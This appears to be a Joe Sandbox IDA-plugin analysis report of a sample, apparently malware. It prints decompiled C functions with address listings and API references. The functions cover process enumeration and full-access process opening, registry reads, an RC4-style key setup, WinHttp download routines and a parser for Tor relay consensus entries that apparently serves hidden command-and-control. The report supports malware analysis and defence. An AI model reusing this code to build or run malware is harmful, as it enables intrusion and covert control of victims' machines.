				intOrPtr _t36;
				signed int _t38;
				char _t40;
				signed short* _t42;

				_t28 = _a4;
				_t40 = _a8;
				 *_a12 = 0;
				 *_a16 = 0;
				_t16 =  *0x3e8628; // 0x622508
				_t17 =  *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x1d0))))(_t28, _t40, 1, 0,  &_a8);
				if(_t17 != 0) {
					_t42 = E003D1D90(_a8 + _a8, 0);
					if(_t42 == 0) {
						L5:
						return 0;
					} else {
						_t36 =  *0x3e8628; // 0x622508
						_push( &_a8);
						_push(_t42);
						_push(0x80000001);
						_push(_t40);
						_push(_t28);
						if( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1d0))))() != 0) {
							_t23 = _t42;
							_t32 = _t42;
							do {
								if( *_t23 == 0xa) {
									_t23 =  &(_t23[1]);
								}
								 *_t32 =  *_t23 & 0x0000ffff;
								_t38 =  *_t23 & 0x0000ffff;
								_t32 =  &(_t32[1]);
								_t23 =  &(_t23[1]);
							} while (_t38 != 0);
							 *_a12 = _t42;
							 *_a16 = _a8 + _a8;
							return 1;
						} else {
							E003CBB40(_t42);
							goto L5;
						}
					}
				} else {
					return _t17;
				}
			}












    0x003cf31a
    0x003cf31e
    0x003cf327
    0x003cf32f
    0x003cf335
    0x003cf342
    0x003cf346
    0x003cf35d
    0x003cf364
    0x003cf38d
    0x003cf393
    0x003cf366
    0x003cf366
    0x003cf375
    0x003cf376
    0x003cf377
    0x003cf37c
    0x003cf37d
    0x003cf382
    0x003cf396
    0x003cf398
    0x003cf3a0
    0x003cf3a4
    0x003cf3a6
    0x003cf3a6
    0x003cf3ac
    0x003cf3af
    0x003cf3b2
    0x003cf3b5
    0x003cf3b8
    0x003cf3c3
    0x003cf3cd
    0x003cf3d6
    0x003cf384
    0x003cf385
    0x00000000
    0x003cf38a
    0x003cf382
    0x003cf34b
    0x003cf34b
    0x003cf34b

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C7850, Relevance: .1, Instructions: 67
    C-Code - Quality: 84%
    			E003C7850(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				char _v524;
				intOrPtr _v552;
				char _v560;
				intOrPtr _t15;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t25;
				void* _t28;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t41;
				void* _t42;

				_t15 =  *0x3e8628; // 0x622508
				_t41 = 0;
				_t28 = __ecx;
				_v560 = 0x22c;
				_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t15 + 0x134))))(2, 0);
				if(_t42 == 0xffffffff) {
					L9:
					return _t41;
				}
				_t18 =  *0x3e8628; // 0x622508
				_push( &_v560);
				_push(_t42);
				if( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x12c))))() != 1) {
					L8:
					_t36 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0xf8))))(_t42);
					goto L9;
				}
				while(1) {
					_t32 =  *0x3e8628; // 0x622508
					_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 0xe0))))( &_v524, _a4);
					_t33 =  *0x3e8628; // 0x622508
					if(_t23 == 0) {
						break;
					}
					_push( &_v560);
					_push(_t42);
					if( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x130))))() == 1) {
						continue;
					}
					goto L8;
				}
				_t25 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x68))))(0x1fffff, 0, _v552);
				if(_t25 != 0) {
					 *((intOrPtr*)(_t28 + 0x68)) = 0;
					_t41 = 1;
					 *_a8 = _t25;
				}
				goto L8;
			}
















    0x003c7859
    0x003c7861
    0x003c7864
    0x003c7866
    0x003c787a
    0x003c787f
    0x003c7911
    0x003c7919
    0x003c7919
    0x003c7885
    0x003c7896
    0x003c7897
    0x003c789d
    0x003c7902
    0x003c7902
    0x003c790f
    0x00000000
    0x003c790f
    0x003c78a0
    0x003c78a3
    0x003c78b7
    0x003c78b9
    0x003c78c1
    0x00000000
    0x00000000
    0x003c78cf
    0x003c78d0
    0x003c78d6
    0x00000000
    0x00000000
    0x00000000
    0x003c78d8
    0x003c78eb
    0x003c78ef
    0x003c78f4
    0x003c78fb
    0x003c7900
    0x003c7900
    0x00000000

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C6740, Relevance: .1, Instructions: 66
    C-Code - Quality: 37%
    			E003C6740(void* __ecx, intOrPtr _a4) {
				intOrPtr _v12;
				char _v20;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				char _v108;
				intOrPtr _v316;
				char _v356;
				intOrPtr _t27;

				_t35 = _a4;
				_push(0);
				_push(0x18);
				_push( &_v44);
				_t27 =  *0x3e8628; // 0x622508
				_push(0);
				_push(_a4);
				if( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x1f0))))() < 0 || E003C6CD0(__ecx, _t35, _v40,  &_v20, 0x10) == 0 || E003C6CD0(__ecx, _t35, _v12,  &_v108, 0x40) == 0 || E003C6CD0(__ecx, _t35, _v48 + _v12,  &_v356, 0xf8) == 0) {
					return 0;
				} else {
					return _v316 + _v12;
				}
			}












    0x003c674c
    0x003c6751
    0x003c6752
    0x003c6757
    0x003c675a
    0x003c6766
    0x003c6767
    0x003c676c
    0x003c67d3
    0x003c67b9
    0x003c67c8
    0x003c67c8

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF550, Relevance: .1, Instructions: 57
    C-Code - Quality: 100%
    			E003CF550(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _t13;
				void* _t15;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr* _t39;

				_t30 =  *0x3e8628; // 0x622508
				_t35 = _a4;
				_t39 = 0;
				_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 0x18))))(_t35, _a8, _a12, _t34, _t38, _t19, __ecx);
				if(_t13 == 0) {
					L4:
					 *_a16 = _t39;
					 *_a20 = 0;
					return 0;
				} else {
					_t27 =  *0x3e8628; // 0x622508
					_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x20))))(_t35, _t13);
					if(_t15 == 0) {
						goto L4;
					} else {
						_t16 =  *0x3e8628; // 0x622508
						_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t16 + 0x38))))(_t15);
						if(_t39 == 0) {
							goto L4;
						} else {
							 *_a16 = _t39 + 4;
							 *_a20 =  *_t39;
							return 1;
						}
					}
				}
			}













    0x003cf55a
    0x003cf563
    0x003cf56c
    0x003cf570
    0x003cf574
    0x003cf5b3
    0x003cf5ba
    0x003cf5bf
    0x003cf5c5
    0x003cf576
    0x003cf576
    0x003cf581
    0x003cf585
    0x00000000
    0x003cf587
    0x003cf588
    0x003cf592
    0x003cf596
    0x00000000
    0x003cf598
    0x003cf5a4
    0x003cf5a7
    0x003cf5b2
    0x003cf5b2
    0x003cf596
    0x003cf585

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E1250, Relevance: .0, Instructions: 11
    C-Code - Quality: 68%
    			E003E1250(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;

				asm("rdtsc");
				_v12 = __eax;
				_v8 = __edx;
				return _v12;
			}





    0x003e1256
    0x003e1258
    0x003e125b
    0x003e1267

    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D4DC1, Relevance: 31.7, APIs: 11, Strings: 10, Instructions: 173string
    C-Code - Quality: 37%
    			E003D4DC1(char* _a4) {
				signed int _v8;
				intOrPtr* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				char* _t63;
				intOrPtr _t69;
				int _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t75;
				int _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t102;
				intOrPtr _t104;
				void* _t105;
				char* _t107;
				intOrPtr _t108;
				void* _t109;
				char* _t111;
				void* _t112;
				void* _t115;
				void* _t116;

				_v24 = 0;
				_t53 =  *0x3e8538(0x80);
				_v12 = _t53;
				_t54 =  *0x3e8538(0x80);
				_v32 = _t54;
				_t55 =  *0x3e8538(0x80);
				_t111 = "\n";
				_v28 = _t55;
				_v36 = 0;
				_v16 = strtok(_a4, _t111);
				_t107 = strtok(0, _t111);
				_t116 = _t115 + 0x1c;
				_v20 = _t107;
				if(_t107 == 0) {
					L24:
					_t112 = 0;
				} else {
					_v8 = _v8 & 0x00000000;
					L3:
					while(1) {
						if( *_t107 != 0x73 || _t107[1] != 0x20) {
							L20:
							_v36 = _v16;
							_v16 = _t107;
							_t63 = strtok(0, _t111);
							_v20 = _t63;
							if(_t63 != 0) {
								_t107 = _v20;
								continue;
							} else {
								_t80 = _v24;
								if(_t80 == 0) {
									goto L24;
								} else {
									 *0x3e8ac4 = _t80;
									_t112 = 1;
								}
							}
						} else {
							if(strstr(_t107, "HSDir") == 0) {
								if(strstr(_t107, "Valid") == 0 || strstr(_t107, "Running") == 0 || strstr(_t107, "Fast") == 0 || strstr(_t107, "Stable") == 0) {
									goto L20;
								} else {
									_t69 =  *0x3e8ac0; // 0x0
									 *((intOrPtr*)(_v8 + _t69 + 0x70)) = 1;
									goto L12;
								}
							} else {
								_t79 =  *0x3e8ac0; // 0x0
								 *(_v8 + _t79 + 0x70) =  *(_v8 + _t79 + 0x70) & 0x00000000;
								L12:
								_push(_v28);
								_t108 = _v12;
								_push(_v32);
								_push(_t108);
								_t70 = sscanf(_v36, "%*[^ ] %*[^ ] %27[^ ] %*[^ ] %*[^ ] %15[^ ] %5s");
								_t116 = _t116 + 0x14;
								if(_t70 != 3) {
									goto L24;
								} else {
									sprintf(_v8 +  *0x3e8ac0, "%s:%s", _v32, _v28);
									_t116 = _t116 + 0x10;
									_t109 = _t108 - 1;
									do {
										_t72 =  *((intOrPtr*)(_t109 + 1));
										_t109 = _t109 + 1;
									} while (_t72 != 0);
									_t73 =  *0x3e8ac0; // 0x0
									_t31 = _t73 + 0x18; // 0x18
									_push(_v8 + _t31);
									_push(_v12);
									asm("movsw");
									_t75 = 0x14;
									asm("movsb");
									if(E003D3933(_t75, _v8) != 0x14) {
										goto L24;
									} else {
										_push(_v12);
										_t77 = sscanf(_v16, "%*[^ ] %43[^ ]");
										_t116 = _t116 + 0xc;
										if(_t77 != 1) {
											goto L24;
										} else {
											_t78 = _v12;
											_t104 =  *0x3e8ac0; // 0x0
											_t38 = _t104 + 0x2c; // 0x2c
											_t105 = _v8 - _t78 + _t38;
											do {
												_t102 =  *_t78;
												 *((char*)(_t105 + _t78)) = _t102;
												_t78 = _t78 + 1;
											} while (_t102 != 0);
											_v24 = _v24 + 1;
											_v8 = _v8 + 0x74;
											_t107 = _v20;
											_t111 = "\n";
											goto L20;
										}
									}
								}
							}
						}
						goto L23;
					}
				}
				L23:
				 *0x3e8540(_v28);
				 *0x3e8540(_v32);
				 *0x3e8540(_v12);
				return _t112;
			}


































    0x003d4dd2
    0x003d4dd5
    0x003d4ddc
    0x003d4ddf
    0x003d4de6
    0x003d4de9
    0x003d4df5
    0x003d4dfe
    0x003d4e01
    0x003d4e08
    0x003d4e0d
    0x003d4e0f
    0x003d4e12
    0x003d4e17
    0x003d4fcb
    0x003d4fcb
    0x003d4e1d
    0x003d4e1d
    0x00000000
    0x003d4e26
    0x003d4e29
    0x003d4f7c
    0x003d4f82
    0x003d4f85
    0x003d4f88
    0x003d4f8c
    0x003d4f91
    0x003d4e23
    0x00000000
    0x003d4f97
    0x003d4f97
    0x003d4f9c
    0x00000000
    0x003d4f9e
    0x003d4fa0
    0x003d4fa5
    0x003d4fa5
    0x003d4f9c
    0x003d4e39
    0x003d4e49
    0x003d4e6a
    0x00000000
    0x003d4eb2
    0x003d4eb2
    0x003d4eba
    0x00000000
    0x003d4eba
    0x003d4e4b
    0x003d4e4b
    0x003d4e53
    0x003d4ec2
    0x003d4ec2
    0x003d4ec5
    0x003d4ec8
    0x003d4ecb
    0x003d4ed4
    0x003d4eda
    0x003d4ee0
    0x00000000
    0x003d4ee6
    0x003d4efb
    0x003d4f01
    0x003d4f04
    0x003d4f05
    0x003d4f05
    0x003d4f08
    0x003d4f09
    0x003d4f0d
    0x003d4f15
    0x003d4f19
    0x003d4f1a
    0x003d4f22
    0x003d4f26
    0x003d4f27
    0x003d4f32
    0x00000000
    0x003d4f38
    0x003d4f38
    0x003d4f43
    0x003d4f49
    0x003d4f4f
    0x00000000
    0x003d4f51
    0x003d4f51
    0x003d4f57
    0x003d4f5f
    0x003d4f5f
    0x003d4f63
    0x003d4f63
    0x003d4f65
    0x003d4f68
    0x003d4f69
    0x003d4f6d
    0x003d4f70
    0x003d4f74
    0x003d4f77
    0x00000000
    0x003d4f77
    0x003d4f4f
    0x003d4f32
    0x003d4ee0
    0x003d4e49
    0x00000000
    0x003d4e29
    0x003d4e26
    0x003d4fa6
    0x003d4fa9
    0x003d4fb2
    0x003d4fbb
    0x003d4fca

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DE97F, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 71librarynetwork
    C-Code - Quality: 86%
    			E003DE97F() {
				char _v404;
				long _v408;
				char _t11;
				signed int _t12;
				_Unknown_base(*)()* _t20;
				signed int _t25;
				signed char _t28;
				struct HINSTANCE__* _t31;
				signed int _t39;
				void* _t41;

				_t41 = (_t39 & 0xfffffff8) - 0x194;
				_v408 = GetTickCount();
				_t11 = 0;
				do {
					 *((char*)(_t11 + 0x3e89b0)) = _t11;
					_t11 = _t11 + 1;
				} while (_t11 != 0x100);
				_t25 = 0;
				_t12 = 0;
				do {
					_t3 = _t12 + 0x3e89b0; // 0x0
					_t28 =  *_t3;
					_t25 = _t25 + ( *(_t41 + (_t12 & 0x00000003) + 0xc) & 0x000000ff) + (_t28 & 0x000000ff) & 0x000000ff;
					_t6 = _t25 + 0x3e89b0; // 0x0
					 *((char*)(_t12 + 0x3e89b0)) =  *_t6;
					_t12 = _t12 + 1;
					 *(_t25 + 0x3e89b0) = _t28;
				} while (_t12 != 0x100);
				 *0x3e89a0 =  *0x3e89a0 & 0x00000000;
				 *0x3e89a4 =  *0x3e89a4 & 0x00000000;
				__imp__#115(0x202,  &_v404);
				_t31 = LoadLibraryA("Advapi32.dll");
				 *0x3e89a8 = GetProcAddress(_t31, "MD5Init");
				 *0x3e89ac = GetProcAddress(_t31, "MD5Update");
				 *0x3e8ab8 = GetProcAddress(_t31, "MD5Final");
				 *0x3e8ab4 = GetProcAddress(_t31, "A_SHAInit");
				 *0x3e899c = GetProcAddress(_t31, "A_SHAUpdate");
				_t20 = GetProcAddress(_t31, "A_SHAFinal");
				 *0x3e8ab0 = _t20;
				return _t20;
			}













    0x003de985
    0x003de994
    0x003de998
    0x003de99f
    0x003de99f
    0x003de9a5
    0x003de9a6
    0x003de9aa
    0x003de9ac
    0x003de9ae
    0x003de9ae
    0x003de9ae
    0x003de9c5
    0x003de9cb
    0x003de9d1
    0x003de9d7
    0x003de9d8
    0x003de9de
    0x003de9e2
    0x003de9e9
    0x003de9fa
    0x003dea11
    0x003dea21
    0x003dea2e
    0x003dea3b
    0x003dea48
    0x003dea55
    0x003dea5a
    0x003dea5e
    0x003dea67

    APIs
    • GetTickCount.KERNEL32(0000000E,00000001,003D03C4), ref: 003DE98E
    • WSAStartup.WS2_32(00000202,?), ref: 003DE9FA
    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 003DEA05
    • GetProcAddress.KERNEL32(00000000,MD5Init), ref: 003DEA19
    • GetProcAddress.KERNEL32(00000000,MD5Update), ref: 003DEA26
    • GetProcAddress.KERNEL32(00000000,MD5Final), ref: 003DEA33
    • GetProcAddress.KERNEL32(00000000,A_SHAInit), ref: 003DEA40
    • GetProcAddress.KERNEL32(00000000,A_SHAUpdate), ref: 003DEA4D
    • GetProcAddress.KERNEL32(00000000,A_SHAFinal), ref: 003DEA5A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C71D0, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 305time
    C-Code - Quality: 44%
    			E003C71D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				int _v40;
				char _v44;
				char _v72;
				signed int _v84;
				intOrPtr _v88;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				void _v132;
				char _v852;
				signed int _t82;
				signed int _t83;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t105;
				void* _t109;
				intOrPtr _t110;
				intOrPtr _t113;
				signed int _t115;
				intOrPtr _t117;
				char* _t118;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t123;
				char* _t161;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr _t166;
				void* _t168;
				void* _t169;
				void* _t171;

				_v40 = 0;
				_v28 = 0;
				_t161 = 0;
				_v8 = 0;
				_t166 = 0;
				_v44 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_t82 = memset( &_v132, 0, 0x3c);
				_t169 = _t168 + 0xc;
				_t83 = _t82 | 0xffffffff;
				_v132 = 0x3c;
				_v124 = _t83;
				_v112 = _t83;
				_v84 = _t83;
				__imp__WinHttpCrackUrl(_a4, 0, 0,  &_v132, __edi, __esi, __ebx);
				if(_t83 == 0) {
					L46:
					_t84 = _v12;
					if(_v12 != 0) {
						E003CBB40(_t84);
					}
					return _v32;
				}
				_t87 = _v112;
				if(_v112 != 0 || _v84 != 0) {
					_t89 = E003D1D90(_t87 + _t87 + 2, 0);
					_t169 = _t169 + 8;
					_v16 = _t89;
					if(_t89 == 0) {
						goto L46;
					}
					_t90 = E003D1D90(_v84 + _v84 + 2, 0);
					_t171 = _t169 + 8;
					_v20 = _t90;
					_t176 = _t90;
					if(_t90 == 0) {
						L44:
						E003CBB40(_v16);
						_t92 = _v20;
						_t169 = _t171 + 4;
						if(_v20 != 0) {
							E003CBB40(_t92);
							_t169 = _t169 + 4;
						}
						goto L46;
					}
					E003CD620(_v16, _v112 + 1, _v116);
					E003CD620(_v20, _v84 + 1, _v88);
					_t99 = E003E1280(_t176, _v16);
					_t171 = _t171 + 4;
					_t177 = _t99;
					if(_t99 != 0) {
						L003E1DC0( &_v72);
						_t101 = E003E1B60( &_v72, _v16, 0x50);
						__eflags = _t101;
						if(_t101 != 0) {
							_t103 = E003E1B30(_v20,  &_v24);
							__eflags = _t103;
							if(_t103 != 0) {
								_v36 = 0;
								_t105 = E003E1C30( &_v72,  &_v12,  &_v36);
								__eflags = _t105;
								if(_t105 != 0) {
									__eflags = _v24 + 0xffffff38 - 0x1a;
									_t142 =  &_v72;
									if(_v24 + 0xffffff38 > 0x1a) {
										L28:
										E003E1730(_t142);
										goto L44;
									}
									_t166 = _v36;
									E003E1730( &_v72);
									L35:
									_t109 = E003C1A80(_t142, _a8, _v12, _t166);
									_t171 = _t171 + 0xc;
									if(_t109 != 0) {
										_v32 = 1;
									}
									L37:
									if(_t161 != 0) {
										__imp__WinHttpCloseHandle(_t161);
									}
									L39:
									_t163 = _v28;
									L40:
									if(_t163 != 0) {
										__imp__WinHttpCloseHandle(_t163);
									}
									L42:
									_t110 = _v40;
									if(_t110 != 0) {
										__imp__WinHttpCloseHandle(_t110);
									}
									goto L44;
								}
								E003E1730( &_v72);
								goto L44;
							}
							E003E1730( &_v72);
							goto L44;
						}
						_t142 =  &_v72;
						goto L28;
					}
					_t113 = E003C9090(_t177,  &_v852, 0x49);
					_t171 = _t171 + 8;
					__imp__WinHttpOpen( &_v852, 0, 0, 0, 0);
					_t164 = _t113;
					_v40 = _t164;
					if(_t164 == 0) {
						goto L44;
					}
					_t115 = _a12 * 0xea60;
					__imp__WinHttpSetTimeouts(_t164, 0x15f90, 0x15f90, 0x2bf20, _t115);
					__imp__WinHttpConnect(_t164, _v16, 0, 0);
					_t163 = _t115;
					_v28 = _t163;
					_t179 = _t163;
					if(_t163 == 0) {
						goto L42;
					}
					E003C9090(_t179,  &_v852, 0x69);
					_t117 = _v120;
					_t171 = _t171 + 8;
					if(_t117 != 1) {
						__eflags = _t117 - 2;
						if(_t117 != 2) {
							goto L40;
						} else {
							_push(0x800000);
							_push(0);
							_push(0);
							_push(0);
							_push(_v20);
							_t118 =  &_v852;
							_push(_t118);
							goto L12;
						}
					} else {
						_t118 = _v20;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(_t118);
						_push( &_v852);
						L12:
						__imp__WinHttpOpenRequest(_t163);
						_t161 = _t118;
						if(_t161 == 0) {
							goto L39;
						}
						__imp__WinHttpSendRequest(_t161, 0, 0, 0, 0, 0, 0);
						if(_t118 == 0) {
							goto L37;
						}
						__imp__WinHttpReceiveResponse(_t161, 0);
						if(_t118 == 0) {
							goto L37;
						}
						_v8 = 4;
						__imp__WinHttpQueryHeaders(_t161, 0x20000013, 0,  &_v24,  &_v8, 0);
						if(_t118 == 0) {
							goto L37;
						}
						_t120 = _v24 + 0xffffff38;
						if(_t120 <= 0x1a) {
							while(1) {
								_t142 =  &_v8;
								_v8 = 0;
								__imp__WinHttpQueryDataAvailable(_t161,  &_v8);
								if(_t120 == 0) {
									goto L37;
								}
								_t121 = _v8;
								if(_t121 == 0) {
									goto L35;
								}
								_t166 = _t166 + _t121;
								_t122 = _v12;
								if(_v12 == 0) {
									_t120 = E003D1D90(_t166, 0);
									_t171 = _t171 + 8;
									_v12 = _t120;
								} else {
									_t123 = E003D1D90(_t166, _t122);
									_v12 = _t123;
									_t171 = _t171 + 8;
									_t120 = _t123 - _v8 + _t166;
								}
								_t142 = _v8;
								__imp__WinHttpReadData(_t161, _t120, _v8,  &_v44);
								if(_t120 == 0) {
									goto L37;
								} else {
									if(_v8 > 0) {
										continue;
									} else {
										goto L35;
									}
								}
							}
						}
						goto L37;
					}
				} else {
					goto L46;
				}
			}














































    0x003c71e5
    0x003c71e8
    0x003c71eb
    0x003c71ed
    0x003c71f0
    0x003c71f2
    0x003c71f5
    0x003c71f8
    0x003c71fb
    0x003c71fe
    0x003c7206
    0x003c720e
    0x003c7213
    0x003c721a
    0x003c721d
    0x003c7220
    0x003c7223
    0x003c722b
    0x003c7515
    0x003c7515
    0x003c751d
    0x003c7520
    0x003c7525
    0x003c752e
    0x003c752e
    0x003c7231
    0x003c7236
    0x003c7247
    0x003c724c
    0x003c724f
    0x003c7254
    0x00000000
    0x00000000
    0x003c7263
    0x003c7268
    0x003c726b
    0x003c726e
    0x003c7270
    0x003c74f9
    0x003c74fd
    0x003c7502
    0x003c7505
    0x003c750a
    0x003c750d
    0x003c7512
    0x003c7512
    0x00000000
    0x003c750a
    0x003c7283
    0x003c7295
    0x003c729e
    0x003c72a3
    0x003c72a6
    0x003c72a8
    0x003c743d
    0x003c744b
    0x003c7450
    0x003c7452
    0x003c746c
    0x003c7474
    0x003c7476
    0x003c7487
    0x003c748a
    0x003c748f
    0x003c7491
    0x003c74a6
    0x003c74a9
    0x003c74ac
    0x003c7457
    0x003c7457
    0x00000000
    0x003c7457
    0x003c74ae
    0x003c74b1
    0x003c74b6
    0x003c74bf
    0x003c74c4
    0x003c74c9
    0x003c74cb
    0x003c74cb
    0x003c74d2
    0x003c74d4
    0x003c74d7
    0x003c74d7
    0x003c74dd
    0x003c74dd
    0x003c74e0
    0x003c74e2
    0x003c74e5
    0x003c74e5
    0x003c74eb
    0x003c74eb
    0x003c74f0
    0x003c74f3
    0x003c74f3
    0x00000000
    0x003c74f0
    0x003c7496
    0x00000000
    0x003c7496
    0x003c7478
    0x00000000
    0x003c7478
    0x003c7454
    0x00000000
    0x003c7454
    0x003c72b7
    0x003c72bc
    0x003c72ca
    0x003c72d0
    0x003c72d2
    0x003c72d7
    0x00000000
    0x00000000
    0x003c72e0
    0x003c72f7
    0x003c7304
    0x003c730a
    0x003c730c
    0x003c730f
    0x003c7311
    0x00000000
    0x00000000
    0x003c7320
    0x003c7325
    0x003c7328
    0x003c732e
    0x003c7341
    0x003c7344
    0x00000000
    0x003c734a
    0x003c734d
    0x003c7352
    0x003c7353
    0x003c7354
    0x003c7355
    0x003c7356
    0x003c735c
    0x00000000
    0x003c735c
    0x003c7330
    0x003c7330
    0x003c7333
    0x003c7334
    0x003c7335
    0x003c7336
    0x003c7337
    0x003c733e
    0x003c735d
    0x003c735e
    0x003c7364
    0x003c7368
    0x00000000
    0x00000000
    0x003c7375
    0x003c737d
    0x00000000
    0x00000000
    0x003c7385
    0x003c738d
    0x00000000
    0x00000000
    0x003c73a3
    0x003c73aa
    0x003c73b2
    0x00000000
    0x00000000
    0x003c73bb
    0x003c73c3
    0x003c73d0
    0x003c73d0
    0x003c73d5
    0x003c73d8
    0x003c73e0
    0x00000000
    0x00000000
    0x003c73e6
    0x003c73eb
    0x00000000
    0x00000000
    0x003c73f1
    0x003c73f3
    0x003c73f8
    0x003c7410
    0x003c7415
    0x003c7418
    0x003c73fa
    0x003c73fc
    0x003c7401
    0x003c7407
    0x003c740a
    0x003c740a
    0x003c741b
    0x003c7425
    0x003c742d
    0x00000000
    0x003c7433
    0x003c7436
    0x00000000
    0x003c7438
    0x00000000
    0x003c7438
    0x003c7436
    0x003c742d
    0x003c73d0
    0x00000000
    0x003c73c3
    0x00000000
    0x00000000
    0x00000000

    APIs
    • memset.MSVCRT ref: 003C71FE
    • WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,003C43BC,?), ref: 003C7223
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
